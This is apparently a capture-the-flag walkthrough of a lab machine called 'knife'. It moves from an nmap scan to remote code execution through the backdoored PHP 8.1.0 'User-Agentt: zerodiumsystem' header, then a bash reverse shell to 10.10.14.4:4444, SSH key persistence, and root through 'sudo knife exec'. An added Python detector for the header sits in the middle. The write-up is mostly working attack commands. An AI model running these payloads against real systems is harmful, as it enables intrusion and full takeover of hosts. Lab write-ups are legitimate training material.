knife

RECON

Medical Website

Nmap Scan

nmap -sC -sV 10.10.10.242

PHP Website

Inspecting Network Properties reveals PHP 8.1.0

PHP Exploit

ENUMERATION

Netcat listener

nc -lvnp 80

Burp Repeater

 User-Agentt: zerodiumsystem('usr/bin/curl 10.10.14.4'); 

Curl Success

Open second listener

nc -lvnp 4444

Reverse Shell

 User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'"); 

Success user James
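
Both requests above carry the misspelled User-Agentt header with a value beginning zerodium, which gives defenders a simple indicator to hunt for in captured requests or proxy logs. The Python below is an added example, not part of the original write-up; the function names and the sample requests are constructed for illustration.

```python
# Added example: triage captured HTTP request heads for the misspelled
# "User-Agentt" header used in the two Burp requests above.
TRIGGER_HEADER = "user-agentt"   # header names are compared case-insensitively
TRIGGER_MARKER = "zerodium"      # value marker seen in the write-up's requests

def parse_headers(raw_request):
    """Return (name, value) pairs from a raw HTTP/1.x request head."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs

def classify(raw_request):
    """'trigger': header plus marker; 'suspicious': header alone; else 'clean'."""
    verdict = "clean"
    for name, value in parse_headers(raw_request):
        if name.lower() != TRIGGER_HEADER:
            continue
        if TRIGGER_MARKER in value.lower():
            return "trigger"
        verdict = "suspicious"                 # misspelled header, no marker
    return verdict

# Constructed sample requests (curl_test reuses the value shown in the write-up).
SAMPLES = {
    "browser": "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\n"
               "User-Agent: Mozilla/5.0\r\n\r\n",
    "curl_test": "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\n"
                 "User-Agentt: zerodiumsystem('usr/bin/curl 10.10.14.4');\r\n\r\n",
    "probe": "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\n"
             "user-agentt: test\r\n\r\n",
    "body_only": "POST /c HTTP/1.1\r\nHost: 10.10.10.242\r\n\r\n"
                 "User-Agentt: zerodium in a body is not a header",
}

def scan(samples):
    """Map each sample name to its verdict."""
    return {name: classify(raw) for name, raw in samples.items()}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:10} {verdict}")
```

The "suspicious" verdict covers the header without the marker, so probing for the header is surfaced as well as the payload itself.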

TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg
press ENTER twice
export TERM=xterm

User Flag

PRIVILEGE ESCALATION

SSH Directory RSA Key

cd .ssh
ls

Send it to authorized keys

cat id_rsa.pub > authorized_keys

Copy Paste to Local Machine

nano id_rsa

chmod 600 id_rsa

SSH

ssh -i id_rsa james@10.10.10.242

Sudo Commands

Running Chef

Knife Command

GTFO Bins

Bypasses Security

sudo knife exec -E 'exec "/bin/sh"'

ROOT Flag

id

cd root
ls
